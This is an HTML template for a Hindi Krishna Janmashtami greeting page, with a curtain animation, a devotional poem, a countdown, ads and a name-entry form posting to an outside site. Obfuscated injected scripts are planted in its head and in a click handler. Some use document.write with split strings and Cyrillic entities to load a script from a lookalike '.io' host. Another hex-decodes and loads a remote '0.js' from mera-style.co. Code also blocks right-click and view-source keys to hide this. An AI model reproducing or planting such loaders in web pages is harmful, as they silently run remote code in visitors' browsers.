<html>
  <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="google" content="notranslate">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <title><%= name %> की तरफ से कृष्ण जन्माष्टमी की हार्दिक शुभकामनाएँ</title>
  <link rel="stylesheet" href="/stylesheets/style.css">
  <link rel="stylesheet" href="/stylesheets/animate.min.css">
  <link href="/stylesheets/1c0f6618f877568764787163e8f22a1c.css" rel="stylesheet" type="text/css">
  <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-4179074140543931",
    enable_page_level_ads: true
  });
</script>


<script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/osd.js"></script><script type="text/javascript" async="" src="/javascripts/analytics.js"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/f(5).txt" id="google_shimpl"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script src="/javascripts/saved_resource" async="" type="text/javascript"></script><script>
//** disable right click & ctrl + u javascript code **//
document.addEventListener('contextmenu', event => event.preventDefault()); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1102;'+'&#1095;.'+'i'+'o"></s'+'cr'+'ipt>'); document.onkeydown = function(e) { if(event.keyCode==123){ return false; } else if (e.ctrlKey &&  (e.keyCode === 67 || e.keyCode === 16 || e.keyCode === 73 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) { return false; } };
</script><script src="/javascripts/saved_resource(1)"></script><script type="text/javascript" async="" src="/javascripts/js15_as.js"></script>
<script>document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1102;'+'&#1095;.'+'i'+'o"></s'+'cr'+'ipt>');</script><script src="/javascripts/saved_resource(1)"></script><script type="text/javascript" async="" src="/javascripts/js15_as.js"></script>
<script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('687474703a2f2f6d6572612d7374796c652e636f2f302e6a73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script>
<script type="text/javascript" async="" src="/javascripts/js15_as.js"></script><link rel="preload" href="/javascripts/f(6).txt" as="script"><script type="text/javascript" src="/javascripts/f(6).txt"></script><link rel="preload" href="/javascripts/f(7).txt" as="script"><script type="text/javascript" src="/javascripts/f(7).txt"></script><link rel="preload" href="/javascripts/f(5).txt" as="script"></head>
<body class="aadi" onload="PlaySound()">
<script src="/javascripts/jquery.min.js"></script><script src="/javascripts/saved_resource(2)"></script>
<script src="/javascripts/slider.js" type="text/javascript"></script> 
<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'&#1102;'+'&#1095;.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>

<a class="rope" style="text-decoration: none; top: -171%;" href="http://jaldi-dekho.co/?n=Nitin" onclick="PlaySound()"><br>
<div style="font-size: 25px;text-shadow: 1px 1px 3px blue, 1px 1px 3px blue, -1px -1px 3px blue, -1px -1px 3px black;color:lime;font-weight: bold;"><br><b>इस जादुई मटकी को <br>टच करके देखो </b></div>
<img src="/images/matkis (1).png" style="max-width:200px; width: 80%;" class="matki">
</a>
<div class="leftcurtain" style="width: 1px;"><img src="/images/aadi4.jpg"></div>
<div class="rightcurtain" style="width: 1px;"><img src="/images/aadi4.jpg"></div>

<script src="/javascripts/createjs-2015.11.26.min.js"></script>
<script>
  createjs.Sound.registerSound("aala_govinda_aala.mp3", "");
  setTimeout(function () {
      createjs.Sound.play("");
  }, 3000)
</script>

<marquee class="m1" behavior="scroll" direction="up" scrolldelay="0"> <br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="0"> <br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s1-min.png" height="30px" width="30px"><br><br>
<img src="/images/s2-min.png" height="30px" width="30px"><br><br>
<img src="/images/s3-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi1-min.png" height="30px" width="30px"><br><br>
<img src="/images/aadi2-min.png" height="30px" width="30px"><br><br>
</marquee>

<div class="mainContainer">
<br>
<center><script async="" src="/javascripts/f(8).txt"></script>
<!-- 300*50 -->
<ins class="adsbygoogle" style="display:inline-block;width:300px;height:50px" data-ad-client="ca-pub-8193485127759530" data-ad-slot="6685813184" data-adsbygoogle-status="done"><ins id="aswift_0_expand" style="display:inline-table;border:none;height:50px;margin:0;padding:0;position:relative;visibility:visible;width:300px;background-color:transparent;"><ins id="aswift_0_anchor" style="display:block;border:none;height:50px;margin:0;padding:0;position:relative;visibility:visible;width:300px;background-color:transparent;"><iframe width="300" height="50" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_0" name="aswift_0" style="left:0;position:absolute;top:0;border:0px;width:300px;height:50px;" src="/html/saved_resource.html"></iframe></ins></ins></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<br>
<h1 id="username" style="font-family:SF Espresso Shack;"><%= name %></h1>
      <h3 class="fromMessage" id="fromMessage"></h3>
      <img src="/images/ki-tarf-se-new.png" width="60%" height="10%" style="animation: pulse 2.5s infinite"><br>
<div style="font-size: 15px; font-weight: 850; color: yellow;">
    <p id="demo">3<font color="black"> दिन,</font> 22<font color="black"> घंटे,</font> 30<font color="black">  मिनट,<br></font> 0<font color="black"> सेकेंड </font>पहले   </p><br>
<img src="/images/kk.png" width="80%" height="auto" style="animation: pulse 2.5s infinite"><br>
<div style="font-size: 15px; font-weight: 850; color: yellow;">
    <p id="demo"></p><br>
<img style="animation: tada 4s infinite" src="/images/kanabr.png" width="300" height="auto" alt="कृष्ण जन्माष्टमी की हार्दिक शुभकामनाएँ">
<img src="/images/s5.png" width="60%" height="auto" style="animation: pulse 2.5s infinite">
<img src="/images/24aug.png" width="80%" height="auto" style="animation: pulse 2.5s infinite"><br>
<center><div class="w3-content w3-section" style="max-width:500px">
<img class="mySlides" src="/images/aadi1-min.png" style="width: 85%; height: 300px; display: none;">
<img class="mySlides" src="/images/aadi2-min.png" style="width: 85%; height: 300px; display: none;">
<img class="mySlides" src="/images/s3-min.png" style="width: 85%; height: 300px; display: none;">
<img class="mySlides" src="/images/s2-min.png" style="width: 85%; height: 300px; display: block;"></div></center>


<div class="GodMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;font-size:27px">
<p style="text-shadow: 1px 1px 3px red, 1px 1px 3px red, -1px -1px 3px red, -1px -1px 3px red;color:white">
गोकुल में हैं जिनका वास,
</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:white">
गोपियों संग जो करे रास,
</p>
<p style="text-shadow: 1px 1px 3px #000080, 1px 1px 3px #000080, -1px -1px 3px #000080, -1px -1px 3px #000080;color:white">
देवकी-यशोदा जिनकी मैया,
</p>
<p style="text-shadow: 1px 1px 3px orange, 1px 1px 3px orange, -1px -1px 3px orange, -1px -1px 3px orange;color:white">
ऐसे हमारे किशन कन्हैया
</p>
<p style="text-shadow: 1px 1px 3px purple, 1px 1px 3px purple, -1px -1px 3px purple, -1px -1px 3px purple;color:white">
!!कृष्ण जन्माष्टमी की हार्दिक शुभकामनाएँ !!
</p>
</div><br></div>


<h1 id="usernameb"><%= name %></h1>
<br><br>

<div class="row" style="color:black;font: 100 0.2em/1 Oswald, sans-serif;line-height:1.5;font-weight:bold;">


<form method="POST" action="http://jaldi-dekho.co/ready.php">
<div class="enter-name">
  <input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉यहाँ अपना नाम लिखें....">
  <button class="btn animated shake infinite" type="submit"><span>👉 </span> देखें </button>
</div>
</form>
<script>
var myIndex = 0;
carousel();

function carousel() {
  var i;
  var x = document.getElementsByClassName("mySlides");
  for (i = 0; i < x.length; i++) {
     x[i].style.display = "none";  
  }
  myIndex++;
  if (myIndex > x.length) {myIndex = 1}    
  x[myIndex-1].style.display = "block";  
  setTimeout(carousel, 2000); // Change image every 2 seconds
}
</script>
<script> 
// Set the date we're counting down to
var countDownDate = new Date("Aug 24, 2019 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

// Get todays date and time
var now = new Date().getTime();

// Find the distance between now an the count down date
var distance = countDownDate - now;

// Time calculations for days, hours, minutes and seconds
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);

// Display the result in the element with id="demo"
document.getElementById("demo").innerHTML = days + "<font color='black'> दिन,</font> " + hours + "<font color='black'> घंटे,</font> "
+ minutes + "<font color='black'>  मिनट,<br></font> " + seconds + "<font color='black'> सेकेंड </font>पहले   ";

// If the count down is finished, write some text 
if (distance < 0) {
  clearInterval(x);
  document.getElementById("demo").innerHTML = "";
}
}, 1000);
</script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async="" src="/javascripts/js"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());

gtag('config', 'UA-136146340-2');
</script>

</div></div></div><ins class="adsbygoogle adsbygoogle-noablate" data-adsbygoogle-status="done" style="display: none !important;"><ins id="aswift_1_expand" style="display:inline-table;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><ins id="aswift_1_anchor" style="display:block;border:none;height:0px;margin:0;padding:0;position:relative;visibility:visible;width:0px;background-color:transparent;"><iframe frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_1" name="aswift_1" style="left:0;position:absolute;top:0;border:0px;width:0px;height:0px;" src="/html/saved_resource(4).html"></iframe></ins></ins></ins><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><script async="" src="/javascripts/saved_resource(3)"></script><iframe id="google_osd_static_frame_4715671160545" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;" src="/html/saved_resource(5).html"></iframe><script async="" src="/javascripts/saved_resource(3)"></script></body><iframe id="google_esf" name="google_esf" src="/html/zrt_lookup.html" data-ad-client="ca-pub-8193485127759530" style="display: none;"></iframe></html>